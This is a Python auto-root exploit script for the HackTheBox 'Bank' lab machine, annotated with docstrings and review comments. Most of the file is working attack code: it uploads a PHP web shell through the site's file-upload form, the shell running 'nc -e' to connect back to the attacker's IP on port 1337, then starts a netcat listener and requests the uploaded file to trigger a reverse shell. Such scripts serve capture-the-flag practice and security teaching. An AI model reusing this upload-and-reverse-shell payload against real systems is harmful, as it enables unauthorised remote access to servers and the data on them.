Auto-Root Python script for HTB Bank machine from HackTheBox
#!/usr/bin/python3.9
"""
htb_bank.py
Author: Donato Di Pasquale (dipa)
Description: Auto-Root Python script for the HTB Bank machine from HackTheBox
Tech Stack Info: Supports Python 3.9 and below
Usage: sudo python3.9 htb_bank.py -t <target> -i <your ip>
"""
import argparse | |
import requests | |
from bs4 import BeautifulSoup, Comment | |
import secrets | |
import subprocess | |
import threading | |
import time | |
import colorama | |
from colorama import Fore | |
# Local intercepting-proxy settings. Defined here but never passed to any
# requests call in this file, so every request below goes out directly.
proxies = dict(
    http="http://127.0.0.1:8080",
    https="http://127.0.0.1:8080",
)
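def parse_arguments(argv=None):
    """Parse the command line.

    Args:
        argv: optional explicit argument list; ``None`` (the default and the
            original behaviour) reads ``sys.argv[1:]``.

    Returns:
        argparse.Namespace with ``target`` and ``ips`` attributes.

    Raises:
        SystemExit: via argparse when an option is missing or malformed. Both
            options are required because every later step concatenates them
            into strings; previously a missing one only surfaced later as a
            TypeError deep inside checkHost/exploit.
    """
    parser = argparse.ArgumentParser(description="HackTheBox Bank Exploit, run this exploit as root")
    # The original left this help text empty.
    parser.add_argument("-t", "--target", type=str, required=True, help="Target host or IP")
    parser.add_argument("-i", "--ips", type=str, required=True, help="Your Host")
    return parser.parse_args(argv)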
""" | |
1. Check if host on port 80 is reachable. -> checkHost() | |
2. Setting up bank.htb in /etc/hosts and delete them after script end. -> writeEtcHosts(args) | |
""" | |
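def checkHost(args):
    """Confirm the target answers on HTTP port 80 before doing anything else.

    Args:
        args: parsed CLI namespace; only ``args.target`` (host or IP) is read.

    Returns:
        ``None`` when the target answers 200 OK, ``1`` on any failure (an
        unexpected status code, or a connection/timeout error). This keeps
        the original truthy-on-failure convention so a caller can write
        ``if checkHost(args): abort``.
    """
    print(Fore.YELLOW + "[DEBUG] Target entered: " + args.target + Fore.RESET)
    print(Fore.YELLOW + "[DEBUG] Send request to http://" + args.target + Fore.RESET)
    try:
        # Bounded timeout so an unreachable host cannot hang the script.
        req = requests.get("http://" + args.target, timeout=5)
    except requests.RequestException as e:
        # Previously unhandled: a refused or timed-out connection ended the
        # script with a traceback instead of a readable error.
        print(Fore.RED + "[ERROR] Target Not Reachable: " + type(e).__name__ + Fore.RESET)
        return 1
    if req.status_code == 200:
        print(Fore.GREEN + "[OK] " + args.target + " Target status code 200 OK" + Fore.RESET)
        return None
    print(Fore.RED + "[ERROR] Target Not Found" + Fore.RESET)
    return 1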
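def writeEtcHosts(args, hosts_path="/etc/hosts"):
    """Map the ``bank.htb`` hostname to ``args.target`` in the hosts file.

    Requires root for the default path (the file is opened for append). The
    entry is NOT removed when the script exits, even though the module
    comment above says it is; remove it by hand afterwards.

    Args:
        args: parsed CLI namespace; only ``args.target`` is read.
        hosts_path: hosts file to edit; defaults to ``/etc/hosts`` and exists
            mainly so the function can be exercised against a scratch file.

    Returns:
        The hostname string ``"bank.htb"``. It is returned even when the
        write fails so the caller's flow is unchanged (the name will then
        simply not resolve).
    """
    dns = "bank.htb"
    print(Fore.YELLOW + "[DEBUG] Try to setting up new dns record " + dns + " in /etc/hosts file")
    try:
        # Re-running the script must not keep appending duplicate lines, so
        # look for an existing "<target> <dns>" line (any whitespace) first.
        with open(hosts_path) as hosts:
            already_present = any(line.split() == [args.target, dns] for line in hosts)
        if not already_present:
            # ``with`` closes the handle; the original never closed it.
            with open(hosts_path, "a") as hosts:
                hosts.write(args.target + "\t" + dns + "\n")
    except Exception as e:
        print(Fore.RED + "[ERROR] " + type(e).__name__ + Fore.RESET)
        if isinstance(e, PermissionError):
            print(Fore.RED + "[ERROR] Run this exploit as root!" + Fore.RESET)
    else:
        # Only report success when the edit actually happened; the original
        # printed this from ``finally``, i.e. even after a failure.
        print(Fore.GREEN + "[OK] " + args.target + " successful added to /etc/hosts" + Fore.RESET)
    return dns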
""" | |
3. Print foothold in HTML. -> findingFoothold(args, dns) | |
4. Load reverse shell in file upload (.htb extension). -> exploit(args,dns) | |
5. Reverse Shell. -> exploit(args,dns) | |
""" | |
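def findingFoothold(args, dns):
    """Print every HTML comment on ``/support.php`` that contains "[DEBUG]".

    Args:
        args: parsed CLI namespace; not used here, kept so all step functions
            share the same call shape.
        dns: hostname to query (as returned by writeEtcHosts).
    """
    # Don't follow redirects: the body of the direct response is what gets
    # inspected. Bounded timeout for consistency with checkHost (the
    # original could hang indefinitely here).
    req = requests.get("http://" + dns + "/support.php", allow_redirects=False, timeout=5)
    soup = BeautifulSoup(req.text, 'html.parser')
    for comment in soup.find_all(string=lambda s: isinstance(s, Comment)):
        if "[DEBUG]" in comment:
            print(Fore.BLUE + "[INFO] Suspicious comment in HTML: " + comment + Fore.RESET)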
def exploit(args,dns):
    """Upload the generated ``.htb`` file to ``/support.php`` and then request it from ``/uploads/``.

    Args:
        args: parsed CLI namespace; ``args.ips`` (the listener host) is read.
        dns: hostname to talk to (as returned by writeEtcHosts).

    Side effects visible in this function: writes a file with a random
    8-hex-character name and ``.htb`` extension into the current working
    directory and never deletes it; starts ``nc -lnvp 1337`` in a non-daemon
    thread, so the process cannot exit until that listener does.
    """
    print(Fore.YELLOW + "[DEBUG] Setting up PHP Reverse Shell" + Fore.RESET)
    # token_hex(4) -> 8 hex characters; random so repeated runs do not collide.
    fileName = secrets.token_hex(nbytes=4) + ".htb"
    print(Fore.YELLOW + "[DEBUG] Load file: " + fileName + Fore.RESET)
    # Port 1337 is fixed here and in nc_command below; change both together.
    malicious_file = ("<?php exec(\'nc -e /var/htb/bin/emergency " + args.ips + " 1337\') ?>")
    file = open(fileName,"w")
    file.write(malicious_file)
    file.close()
    print(Fore.YELLOW + "[DEBUG] Setting up HTTP POST Request" + Fore.RESET)
    # NOTE(review): this handle is never closed (resource leak); a ``with``
    # block around the post would fix it.
    files = {'fileToUpload': open(fileName,'rb')}
    values = {'title':"test", 'message':'test', 'submitadd':''}
    # NOTE(review): ``headers`` is built but never passed to requests.post.
    headers = {'Content-type': 'application/x-php'}
    print(Fore.YELLOW + "[DEBUG] Send payload and waiting for reverse shell..."+ Fore.RESET)
    # NOTE(review): ``verify=False`` is a no-op on a plain-http URL, and the
    # response status is never checked, so a rejected upload goes unnoticed.
    req = requests.post("http://" + dns + "/support.php", files=files, data=values, verify=False)
    def run_listener():
        # Constant command string, so shell=True adds no injection surface here;
        # wait() keeps this thread (and thus the process) alive until nc exits.
        nc_command = "nc -lnvp 1337"
        nc_process = subprocess.Popen(nc_command, shell=True)
        nc_process.wait()
    def run_reverse():
        # NOTE(review): the URL contains a double slash ("//uploads/"); no
        # timeout, and the response is never inspected.
        req = requests.get("http://" + dns + "/" + "/uploads/" + fileName)
    listener_thread = threading.Thread(target=run_listener)
    listener_thread.start()
    # NOTE(review): nothing waits for nc to be listening before the trigger
    # request is sent; there may be a race on slow hosts — confirm.
    run_reverse()
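def main():
    """Run the steps in order, stopping early when the target is unreachable.

    Returns:
        ``1`` when checkHost reports failure, otherwise ``None``.
    """
    args = parse_arguments()
    # checkHost returns a truthy value (1) on failure; the original ignored
    # it and went on to edit /etc/hosts and post to an unreachable host.
    if checkHost(args):
        return 1
    dns = writeEtcHosts(args)
    findingFoothold(args, dns)
    exploit(args, dns)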
if __name__ == "__main__":
    # Script entry point; propagate main()'s return value as the exit status.
    raise SystemExit(main())
""" | |
Box URL: https://app.hackthebox.com/machines/Bank | |
Box writeup: https://0xdf.gitlab.io/2020/07/07/htb-bank.html | |
""" |